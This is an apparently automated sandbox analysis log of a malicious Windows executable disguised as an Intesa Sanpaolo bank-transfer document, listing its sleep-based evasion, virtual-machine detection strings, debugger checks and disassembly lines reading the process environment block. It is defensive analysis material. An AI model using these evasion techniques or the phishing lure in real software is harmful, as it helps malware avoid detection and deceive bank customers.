          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7408Thread sleep count: 4114 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7408Thread sleep time: -8228000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7408Thread sleep count: 5821 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7408Thread sleep time: -11642000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 8080Thread sleep count: 131 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 8080Thread sleep time: -262000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 8080Thread sleep count: 9841 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 8080Thread sleep time: -19682000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
          Source: explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1356491730.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000r
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Z
          Source: explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1356491730.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}AsVuser
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}otti
          Source: explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\
          Source: explorer.exe, 00000007.00000000.1361155692.0000000004027000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s/U6
          Source: explorer.exe, 00000007.00000002.3770457753.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00j
          Source: explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0040ACF0 LdrLoadDll,6_2_0040ACF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_002269F5 IsDebuggerPresent,8_2_002269F5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01180115 mov eax, dword ptr fs:[00000030h]6_2_01180115
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116A118 mov ecx, dword ptr fs:[00000030h]6_2_0116A118
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116A118 mov eax, dword ptr fs:[00000030h]6_2_0116A118
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116A118 mov eax, dword ptr fs:[00000030h]6_2_0116A118
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116A118 mov eax, dword ptr fs:[00000030h]6_2_0116A118
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F0124 mov eax, dword ptr fs:[00000030h]6_2_010F0124
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01158158 mov eax, dword ptr fs:[00000030h]6_2_01158158
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01154144 mov eax, dword ptr fs:[00000030h]6_2_01154144
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01154144 mov eax, dword ptr fs:[00000030h]6_2_01154144
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01154144 mov ecx, dword ptr fs:[00000030h]6_2_01154144
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01154144 mov eax, dword ptr fs:[00000030h]6_2_01154144
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01154144 mov eax, dword ptr fs:[00000030h]6_2_01154144
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6154 mov eax, dword ptr fs:[00000030h]6_2_010C6154
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6154 mov eax, dword ptr fs:[00000030h]6_2_010C6154
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BC156 mov eax, dword ptr fs:[00000030h]6_2_010BC156
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114019F mov eax, dword ptr fs:[00000030h]6_2_0114019F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114019F mov eax, dword ptr fs:[00000030h]6_2_0114019F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114019F mov eax, dword ptr fs:[00000030h]6_2_0114019F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114019F mov eax, dword ptr fs:[00000030h]6_2_0114019F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01100185 mov eax, dword ptr fs:[00000030h]6_2_01100185
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01164180 mov eax, dword ptr fs:[00000030h]6_2_01164180
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01164180 mov eax, dword ptr fs:[00000030h]6_2_01164180
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA197 mov eax, dword ptr fs:[00000030h]6_2_010BA197
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA197 mov eax, dword ptr fs:[00000030h]6_2_010BA197
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA197 mov eax, dword ptr fs:[00000030h]6_2_010BA197
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117C188 mov eax, dword ptr fs:[00000030h]6_2_0117C188
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117C188 mov eax, dword ptr fs:[00000030h]6_2_0117C188
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E1D0 mov eax, dword ptr fs:[00000030h]6_2_0113E1D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E1D0 mov eax, dword ptr fs:[00000030h]6_2_0113E1D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0113E1D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E1D0 mov eax, dword ptr fs:[00000030h]6_2_0113E1D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E1D0 mov eax, dword ptr fs:[00000030h]6_2_0113E1D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011861C3 mov eax, dword ptr fs:[00000030h]6_2_011861C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011861C3 mov eax, dword ptr fs:[00000030h]6_2_011861C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F01F8 mov eax, dword ptr fs:[00000030h]6_2_010F01F8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011961E5 mov eax, dword ptr fs:[00000030h]6_2_011961E5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144000 mov ecx, dword ptr fs:[00000030h]6_2_01144000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01162000 mov eax, dword ptr fs:[00000030h]6_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE016 mov eax, dword ptr fs:[00000030h]6_2_010DE016
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE016 mov eax, dword ptr fs:[00000030h]6_2_010DE016
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE016 mov eax, dword ptr fs:[00000030h]6_2_010DE016
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE016 mov eax, dword ptr fs:[00000030h]6_2_010DE016
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156030 mov eax, dword ptr fs:[00000030h]6_2_01156030
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA020 mov eax, dword ptr fs:[00000030h]6_2_010BA020
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BC020 mov eax, dword ptr fs:[00000030h]6_2_010BC020
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01146050 mov eax, dword ptr fs:[00000030h]6_2_01146050
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C2050 mov eax, dword ptr fs:[00000030h]6_2_010C2050
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EC073 mov eax, dword ptr fs:[00000030h]6_2_010EC073
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C208A mov eax, dword ptr fs:[00000030h]6_2_010C208A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011860B8 mov eax, dword ptr fs:[00000030h]6_2_011860B8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011860B8 mov ecx, dword ptr fs:[00000030h]6_2_011860B8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011580A8 mov eax, dword ptr fs:[00000030h]6_2_011580A8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011420DE mov eax, dword ptr fs:[00000030h]6_2_011420DE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011020F0 mov ecx, dword ptr fs:[00000030h]6_2_011020F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C80E9 mov eax, dword ptr fs:[00000030h]6_2_010C80E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]6_2_010BA0E3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011460E0 mov eax, dword ptr fs:[00000030h]6_2_011460E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BC0F0 mov eax, dword ptr fs:[00000030h]6_2_010BC0F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA30B mov eax, dword ptr fs:[00000030h]6_2_010FA30B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA30B mov eax, dword ptr fs:[00000030h]6_2_010FA30B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA30B mov eax, dword ptr fs:[00000030h]6_2_010FA30B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BC310 mov ecx, dword ptr fs:[00000030h]6_2_010BC310
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E0310 mov ecx, dword ptr fs:[00000030h]6_2_010E0310
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01168350 mov ecx, dword ptr fs:[00000030h]6_2_01168350
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov ecx, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A352 mov eax, dword ptr fs:[00000030h]6_2_0118A352
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116437C mov eax, dword ptr fs:[00000030h]6_2_0116437C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E438F mov eax, dword ptr fs:[00000030h]6_2_010E438F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E438F mov eax, dword ptr fs:[00000030h]6_2_010E438F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011643D4 mov eax, dword ptr fs:[00000030h]6_2_011643D4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011643D4 mov eax, dword ptr fs:[00000030h]6_2_011643D4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011463C0 mov eax, dword ptr fs:[00000030h]6_2_011463C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117C3CD mov eax, dword ptr fs:[00000030h]6_2_0117C3CD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F63FF mov eax, dword ptr fs:[00000030h]6_2_010F63FF
